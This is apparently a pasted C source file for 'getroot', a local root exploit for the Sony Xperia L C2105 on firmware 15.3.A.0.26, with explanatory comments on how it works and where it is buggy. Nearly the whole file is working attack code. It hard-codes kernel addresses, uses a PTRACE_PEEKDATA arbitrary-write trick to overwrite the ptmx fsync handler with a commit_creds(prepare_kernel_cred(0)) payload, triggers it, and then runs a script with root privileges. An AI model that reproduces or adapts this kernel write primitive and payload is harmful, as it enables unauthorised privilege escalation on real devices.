Snow_Basinger

Xperia L C2105 15.3.A.0.26 getroot.c

Nov 29th, 2013
  1. /* getroot for Xperia L C2105 15.3.A.0.26 */
  2.  
  3. /*
  4. * Copyright (C) 2013 CUBE
  5. *
  6. * This program is free software: you can redistribute it and/or modify
  7. * it under the terms of the GNU General Public License as published by
  8. * the Free Software Foundation, either version 3 of the License, or
  9. * (at your option) any later version.
  10. *
  11. * This program is distributed in the hope that it will be useful,
  12. * but WITHOUT ANY WARRANTY; without even the implied warranty of
  13. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  14. * GNU General Public License for more details.
  15. *
  16. * You should have received a copy of the GNU General Public License
  17. * along with this program. If not, see <http://www.gnu.org/licenses/>.
  18. *
  19. */
  20.  
/*
 * Kernel addresses specific to the firmware named in the title comment.
 * main() casts the first two into function pointers; run_exploit() uses
 * PTMX_FOPS_ADDRESS as the base of its write target.  They carry no meaning
 * for any other kernel image.
 */
#define PREPARE_KERNEL_CRED_ADDRESS 0xc00a87c8
#define COMMIT_CREDS_ADDRESS 0xc00a82ec
#define PTMX_FOPS_ADDRESS 0xc1087aa0
/* Script handed to system() by main() once getuid() reports 0. */
#define EXECCOMMAND "/data/local/tmp/install_tool.sh"
  25.  
  26. #include <stdio.h>
  27. #include <stdlib.h>
  28. #include <sys/ptrace.h>
  29. #include <sys/syscall.h>
  30. #include <stdbool.h>
  31. #include <errno.h>
  32. #include <signal.h>
  33. #include <sys/wait.h>
  34. #include <sys/types.h>
  35. #include <sys/stat.h>
  36. #include <fcntl.h>
  37.  
/* Device node opened by run_obtain_root_privilege(). */
#define PTMX_DEVICE "/dev/ptmx"

/* Opaque kernel types; only pointers to them appear in this file. */
struct cred;
struct task_struct;

/*
 * Function pointers aimed at kernel routines.  main() assigns them from the
 * hard-coded *_ADDRESS constants above; obtain_root_privilege() calls them.
 */
struct cred *(*prepare_kernel_cred)(struct task_struct *);
int (*commit_creds)(struct cred *);

/*
 * Handshake flag used by ptrace_write_value_at_address(): the forked child
 * sets it to true in its own address space and the parent copies the child's
 * copy into its own via PTRACE_PEEKDATA.  The spelling is the original's.
 */
bool bChiled;
  47.  
/*
 * Payload whose address is written into the ptmx file_operations slot by
 * run_exploit(); it is meant to execute when that slot is dispatched.
 * Calls the two kernel routines through the pointers set up in main(),
 * passing the literal 0 as the task argument.  Neither return value is
 * checked.
 */
void obtain_root_privilege(void) {
    commit_creds(prepare_kernel_cred(0));
}
  51.  
/*
 * Trigger callback passed to ptrace_run_exploit().  Opens the ptmx device and
 * issues fsync() on it; run_exploit() has overwritten the slot it calls
 * ptmx_fsync_address, so this is the call meant to reach the payload.
 * user_data is unused.
 *
 * The open() result is not checked: on failure fsync()/close() run on -1 and
 * the function still returns true, so the return value means "ran", not
 * "succeeded" -- main() judges success via getuid() instead.  fsync() and
 * close() have no prototype in this file (no <unistd.h> is included).
 */
static bool run_obtain_root_privilege(void *user_data) {
    int fd;

    fd = open(PTMX_DEVICE, O_WRONLY);
    fsync(fd);
    close(fd);

    return true;
}
  61.  
/*
 * Write primitive built on the raw PTRACE_PEEKDATA syscall, which stores the
 * word read from the tracee at `addr` through the `data` pointer.
 *
 * The parent first polls with addr = data = &bChiled until the child's copy
 * of bChiled reads true in the parent's own copy.  It then issues a second
 * request with addr = &value (the child's copy of this function's `value`
 * argument, identical after fork()) and data = `address`, so that the
 * pointer value is stored at `address`.  This depends on the running kernel
 * not validating `data` for that request; on a kernel that does, the call
 * fails and nothing is written.
 *
 * Observations on the code as written (left unchanged):
 *  - `ret` from the polling loop is overwritten unexamined; the loop has no
 *    timeout and does not stop on error.
 *  - the error path after the second request only logs, so the caller cannot
 *    tell whether the write took effect.
 *  - waitpid() with WNOHANG may return before the killed child is reaped.
 *  - strerror() and getpid() are used without <string.h>/<unistd.h>.
 *
 * @param address  destination address of the write
 * @param value    pointer value to store there
 */
void ptrace_write_value_at_address(unsigned long int address, void *value) {
    pid_t pid;
    long ret;
    int status;

    bChiled = false;
    pid = fork();
    if (pid < 0) {
        return;
    }
    if (pid == 0) {
        /* Child: become a tracee of the parent, then flag readiness. */
        ret = ptrace(PTRACE_TRACEME, 0, 0, 0);
        if (ret < 0) {
            fprintf(stderr, "PTRACE_TRACEME failed\n");
        }
        bChiled = true;
        /*
         * SIGSTOP cannot be ignored, so the signal() call has no effect; the
         * self-directed kill() stops the child, which PTRACE_PEEKDATA needs.
         */
        signal(SIGSTOP, SIG_IGN);
        kill(getpid(), SIGSTOP);
        exit(EXIT_SUCCESS);
    }

    /* Parent: copy the child's bChiled into ours until it reads true. */
    do {
        ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, pid, &bChiled, &bChiled);
    } while (!bChiled);

    /* Read the child's `value` and store it at `address` (see header). */
    ret = syscall(__NR_ptrace, PTRACE_PEEKDATA, pid, &value, (void *)address);
    if (ret < 0) {
        fprintf(stderr, "PTRACE_PEEKDATA failed: %s\n", strerror(errno));
    }

    kill(pid, SIGKILL);
    waitpid(pid, &status, WNOHANG);
}
  95.  
/*
 * Performs the write and then invokes the trigger callback.
 *
 * ptrace_write_value_at_address() returns void, so `success` reflects only
 * the callback's return value, never whether the write itself took effect.
 *
 * @param address          target of the write
 * @param value            pointer value to store there
 * @param exploit_callback trigger run after the write
 * @param user_data        passed through to the callback unchanged
 * @return the callback's result
 */
bool ptrace_run_exploit(unsigned long int address, void *value, bool (*exploit_callback)(void *user_data), void *user_data) {
    bool success;

    ptrace_write_value_at_address(address, value);
    success = exploit_callback(user_data);

    return success;
}
  104.  
/*
 * Computes the write target and runs the exploit.
 *
 * The target is PTMX_FOPS_ADDRESS + 0x38; the variable name says the author
 * takes that to be the fsync entry of the ptmx file_operations for this
 * firmware (not verified anywhere in this file -- TODO confirm against the
 * kernel's struct layout).  The value written is the address of
 * obtain_root_privilege(); the trigger is run_obtain_root_privilege().
 *
 * @return the trigger's result, which is always true (see that function)
 */
static bool run_exploit(void) {
    unsigned long int ptmx_fops_address;
    unsigned long int ptmx_fsync_address;

    ptmx_fops_address = PTMX_FOPS_ADDRESS;
    ptmx_fsync_address = ptmx_fops_address + 0x38;
    return ptrace_run_exploit(ptmx_fsync_address, &obtain_root_privilege, run_obtain_root_privilege, NULL);
}
  113.  
/*
 * Entry point.  Wires the kernel function pointers from the hard-coded
 * addresses, runs the exploit (its return value is ignored), and treats
 * getuid() == 0 as the success test.  On success it calls system() on
 * EXECCOMMAND, a script under /data/local/tmp, so whatever file is at that
 * path runs with the newly obtained privileges.
 *
 * argc/argv and `pid` are unused; the `return 0` after exit() is
 * unreachable; getuid() has no prototype here (no <unistd.h> is included).
 */
int main(int argc, char **argv) {
    pid_t pid; /* unused */

    prepare_kernel_cred = (void *)PREPARE_KERNEL_CRED_ADDRESS;
    commit_creds = (void *)COMMIT_CREDS_ADDRESS;

    printf("Wait a minutes...\n");
    run_exploit();

    if (getuid() != 0) {
        printf("Failed to getroot.\n");
        exit(EXIT_FAILURE);
    }

    printf("Succeeded in getroot!\n");
    system(EXECCOMMAND);

    exit(EXIT_SUCCESS);
    return 0;
}